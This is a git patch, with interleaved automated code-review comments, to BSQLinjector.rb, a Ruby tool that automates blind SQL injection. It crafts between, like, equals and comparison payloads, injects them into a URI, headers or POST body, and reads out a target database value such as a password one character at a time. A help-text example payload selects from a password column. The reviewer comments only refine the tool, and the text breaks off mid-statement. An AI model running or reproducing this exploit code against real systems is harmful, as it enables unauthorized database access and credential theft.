From 0146806ed81a0ac7064860c9ae963ded47d850c9 Mon Sep 17 00:00:00 2001 From: enjoiz Date: Fri, 15 Jan 2016 19:44:12 +0100 Subject: [PATCH] Update BSQLinjector.rb --- BSQLinjector.rb | 1428 +++++++++-------------------------------------- 1 file changed, 278 insertions(+), 1150 deletions(-) diff --git a/BSQLinjector.rb b/BSQLinjector.rb index 9abb3ea..38245c5 100755 --- a/BSQLinjector.rb +++ b/BSQLinjector.rb @@ -24,6 +24,7 @@ $oh = "" # this character is used when opening string when comparing $bracket = ")" # substring ending brackets $case = "n" # setting case sensitivity +$hexbracket = "y" # hex delimeter - bracket (y) or space (n) $verbose = "n" # verbose messaging $test = "n" # test mode @@ -51,7 +52,7 @@ $test = "y" if arg.include?("--test") $bracket = arg.split("=")[1].to_i - 1 if arg.include?("--bracket=") alls = "y" if arg.include?("--special") - + $hexbracket = "n" if arg.include?("--hexspace") $search = arg.split("=")[1] if arg.include?("--pattern=") && arg.count("=") == 1 $prepend = arg.split("=")[1] if arg.include?("--prepend=") && arg.count("=") == 1 $append = arg.split("=")[1] if arg.include?("--append=") && arg.count("=") == 1 
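Review bot: The comment on the new `$hexbracket` default misspells "delimiter" and leaves out that the setting is only read when hex mode is on (the helpers added later in this patch check it only inside `if $hex == "y"`). Suggested wording: `$hexbracket = "y" # hex delimiter - bracket (y) or space (n); only read when $hex == "y"`.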
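Review bot: The new `--hexspace` switch is detected with `arg.include?("--hexspace")`, a substring test, so any argument that merely contains that text (for instance inside a `--prepend=` or `--append=` value) also flips `$hexbracket`. An exact comparison, `$hexbracket = "n" if arg == "--hexspace"`, keeps the flag from being set by accident. The neighbouring `--test` and `--special` lines in this hunk use the same substring pattern, so they share the problem. The argument loop itself starts and ends outside the hunk.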
@@ -71,6 +72,7 @@ puts " --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement)" puts " --prepend Mandatory - Main payload. (--prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\"" puts " --append How to end our payload. For example comment out rest of SQL statement. (--append=\'#)" + puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" puts " --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)" puts "" puts " --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)" @@ -83,7 +85,7 @@ puts " --test Enable test mode. Do not send request, just show full payload." puts " --comma Encode comma." puts " --bracket Add brackets to the end of substring function. --bracket=\"))\"" - puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" + puts " --hexspace Use space instead of brackets to split hex values." puts " --special Include all special characters in enumeration." puts " --start Start enumeration from specified character. (--start=10)" puts " --max Maximum characters to enumerate. (--max=10)" @@ -91,7 +93,7 @@ puts " --verbose Show verbose messages." puts "" puts "Example usage:" - puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" + puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --schar=\"'\" --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" puts "" exit(1) else 
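Review bot: The `--hexspace` help line added in the -83,7 hunk does not say that the option only matters in hex mode, although the new helpers later in this patch consult `$hexbracket` only when `$hex == "y"`. The `--schar` line already carries that kind of caveat. I would end the new help string with a matching sentence, e.g. `... to split hex values. Has no effect outside hex mode."`.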
@@ -107,7 +109,7 @@ # arrays for Blind exploitation $arrs = [",", "_", "."] if alls == "y" - $arrs += ["+", "/", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] + $arrs += ["+", "/", "=", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] end $arrn1 = ["0", "1", "2", "3", "4"] $arrn2 = ["5", "6", "7", "8", "9"] @@ -176,15 +178,13 @@ def configreq(chars) if $test == "y" puts "Payload example:" if $comma == "y" - puts $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append + puts $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append else - puts $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append + puts $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append end exit(1) end - found = 0 # for detecting injected payload - # check HTTP method if File.readlines($file)[0].include?("GET ") $method = "get" 
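Review bot: The escaping chain `chars.gsub("%", "%25")....gsub(" ", "+")` in the `configreq` hunk is written out in both `$comma` branches, and again in the URI, header and POST-body hunks that follow, so the same expression now exists eight times and each copy has to be edited by hand whenever it changes (as this commit had to do). Build it once at the top of `configreq`: `enc = chars.gsub("%", "%25")...`, `sep = $comma == "y" ? "%2C1" : ",1"`, `payload = $prepend + $i.to_s + sep + $bracket + enc + $append`, and let each site call `sub("SQLINJECT", payload)`. A one-line comment on `enc` saying which characters are escaped and why would also help the next reader. `configreq` continues outside this hunk.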
@@ -192,14 +192,16 @@ def configreq(chars) $method = "post" end + found = 0 # for detecting injected payload + # get URI path $uri = File.readlines($file)[0].split(" ")[1] turi = URI.decode($uri).gsub("+", " ") if turi.include?("SQLINJECT") if $comma == "y" - $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end @@ -213,9 +215,9 @@ def configreq(chars) header = File.readlines($file)[i].chomp if header.include?("SQLINJECT") if $comma == "y" - header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end 
@@ -238,9 +240,9 @@ def configreq(chars) tline = postline.gsub("+", " ") if tline.include?("SQLINJECT") if $comma == "y" - postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) else - postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.sub("%", "%25").sub("&", "%26").sub("+", "%2B").sub(";", "%3B").sub("#", "%23") + $append) + postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) end found = found + 1 end 
@@ -397,9 +399,110 @@ def send2ndreq() } end +# create between payload +def cbetween(a, b, c) + if $hex == "y" + if $hexbracket == "n" + configreq("between" + " 0x" + a.unpack('H*')[0] + " and " + "0x" + b.unpack('H*')[0]) + else + configreq("between" + "(0x" + a.unpack('H*')[0] + ")and(" + "0x" + b.unpack('H*')[0] + ")") + end + else + configreq("between" + $oh + a + $oh + "and" + $oh + b) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if ($response.body.include?($search) || $fheader == "y") && c == "yes" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# creating moreless payload +def cmoreless(a, b, c) + if $hex == "y" + if $hexbracket == "n" + configreq(a + " 0x" + b.unpack('H*')[0]) + else + configreq(a + "(0x" + b.unpack('H*')[0] + ")") + end + else + configreq(a + $oh + b) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if ($response.body.include?($search) || $fheader == "y") && c == "yes" + $result = $result + b + puts "Letter " + $i.to_s + " found: " + b + $letter = 1 + end +end + +# creating like payload +def clike(a) + if $hex == "y" + if $hexbracket == "n" + configreq("like" + " " + "0x" + a.unpack('H*')[0]) + else + configreq("like" + "(" + "0x" + a.unpack('H*')[0] + ")") + end + else + configreq("like" + $oh + a) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if $response.body.include?($search) || $fheader == "y" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# creating equal payload +def cequal(a) + if $hex == "y" + 
if $hexbracket == "n" + configreq("=" + "0x" + a.unpack('H*')[0]) + else + configreq("=" + "(0x" + a.unpack('H*')[0] + ")") + end + else + configreq("=" + $oh + a) + end + sendreq() + send2ndreq() if $secfile != "" + $fheader = "n" + $response.to_hash.each { |k,v| + $fheader = "y" if k.to_s.include?($search) + $fheader = "y" if v.to_s.include?($search) + } + if $response.body.include?($search) || $fheader == "y" + $result = $result + a + puts "Letter " + $i.to_s + " found: " + a + $letter = 1 + end +end + +# do enumeration until $i >= $max do $i = $i + 1 - found = 0 + $letter = 0 if ($result == "aaaaa") puts "It seems like your payload gives always true condition. Try another parameter\'s value or different payload.\n"; break @@ -408,44 +511,16 @@ def send2ndreq() if $mode == "e" if $case == "n" for ch in $arrays - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cequal(ch) + if $letter == 1 + break end end else for ch in $arraysc - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cequal(ch) + if $letter == 1 + break end end end 
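Review bot: The four new helpers (`cbetween`, `cmoreless`, `clike`, `cequal`) each repeat the same send-and-scan block and report the outcome only through the globals `$response`, `$fheader` and `$letter`, so callers in the later hunks have to re-evaluate `$response.body.include?($search) || $fheader == "y"` straight after `cbetween(..., "no")`. Compute that once in the helper as `matched = $response.body.include?($search) || $fheader == "y"` and make `matched` the return value, so callers can write `if cbetween("a", "z", "no")`. The `c` parameter would read better as a boolean than as the strings "yes"/"no", and none of the helpers has a comment explaining what `c` controls. `sendreq` and `send2ndreq` are defined outside this hunk, so whether `$response.body` can be nil at this point cannot be confirmed from the diff.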
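Review bot: After this change the `$case == "n"` and `else` branches of the equals-mode loop are identical except for the array they walk (`$arrays` vs `$arraysc`), and the like-mode hunk at -453,46 has the same shape. Select the array once, `chars = $case == "n" ? $arrays : $arraysc`, and keep a single loop whose exit is `break if $letter == 1`. The enclosing `until $i >= $max` loop continues outside this hunk.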
@@ -453,46 +528,28 @@ def send2ndreq() if $case == "n" for ch in $arrays if ch != "%" && ch != "_" - if $hex == "y" - configreq("like" + " " + "0x" + ch.unpack('H*')[0]) - else - configreq("like" + $oh + ch) + clike(ch) + if $letter == 1 + break end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + else + cequal(ch) + if $letter == 1 + break end end end else for ch in $arraysc if ch != "%" && ch != "_" - if $hex == "y" - configreq("like" + " " + "0x" + ch.unpack('H*')[0]) - else - configreq("like" + $oh + ch) + clike(ch) + if $letter == 1 + break end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + else + cequal(ch) + if $letter == 1 + break end end end 
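Review bot: The new `else` branches that send `%` and `_` through `cequal` instead of `clike` have no comment, and the reason is not obvious from the code. A short why-comment above the `if ch != "%" && ch != "_"` test would cover it, for example `# % and _ are LIKE wildcards, so they are compared with = instead`. That reading is inferred from the condition itself, so the author should confirm it.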
@@ -501,279 +558,79 @@ def send2ndreq() elsif $mode == "b" # lowercase - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "z".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "z") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "z", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "m".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "m") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "m", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "f".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "f") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "f", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "a".unpack('H*')[0] + " and " + "0x" + "c".unpack('H*')[0]) - else - configreq("between" + $oh + "a" + $oh + "and" + $oh + "c") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("a", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + 
ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr2 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "g".unpack('H*')[0] + " and " + "0x" + "i".unpack('H*')[0]) - else - configreq("between" + $oh + "g" + $oh + "and" + $oh + "i") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("g", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - 
$result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr4 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end end else - if $hex == "y" - configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "s".unpack('H*')[0]) - else - configreq("between" + $oh + "n" + $oh + "and" + $oh + "s") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("n", "s", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "n".unpack('H*')[0] + " and " + "0x" + "p".unpack('H*')[0]) - else - configreq("between" + $oh + "n" + $oh + "and" + $oh + "p") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("n", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if 
k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr6 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "t".unpack('H*')[0] + " and " + "0x" + "v".unpack('H*')[0]) - else - configreq("between" + $oh + "t" + $oh + "and" + $oh + "v") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("t", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr8 - if $hex == "y" - configreq(" between" + " 
0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end 
@@ -782,280 +639,80 @@ def send2ndreq() end # uppercase - only when case-sensitive specified - if $case == "y" && found == 0 - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "Z".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "Z") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $case == "y" && $letter == 0 + cbetween("A", "Z", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "M".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "M") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "M", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "F".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "F") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "F", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "A".unpack('H*')[0] + " and " + "0x" + "C".unpack('H*')[0]) - else - configreq("between" + $oh + "A" + $oh + "and" + $oh + "C") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("A", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 - if 
$hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr10 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "G".unpack('H*')[0] + " and " + "0x" + "I".unpack('H*')[0]) - else - configreq("between" + $oh + "G" + $oh + "and" + $oh + "I") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("G", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if 
v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr12 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end end else - if $hex == "y" - configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "S".unpack('H*')[0]) - else - configreq("between" + $oh + "N" + $oh + "and" + $oh + "S") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("N", "S", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq(" between" + " 0x" + "N".unpack('H*')[0] + " and " + "0x" + "P".unpack('H*')[0]) - else - configreq("between" + $oh + "N" + $oh + "and" + $oh + "P") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cbetween("N", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" 
- $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arr14 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end else - if $hex == "y" - configreq(" between" + " 0x" + "T".unpack('H*')[0] + " and " + "0x" + "V".unpack('H*')[0]) - else - configreq("between" + $oh + "T" + $oh + "and" + $oh + "V") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = 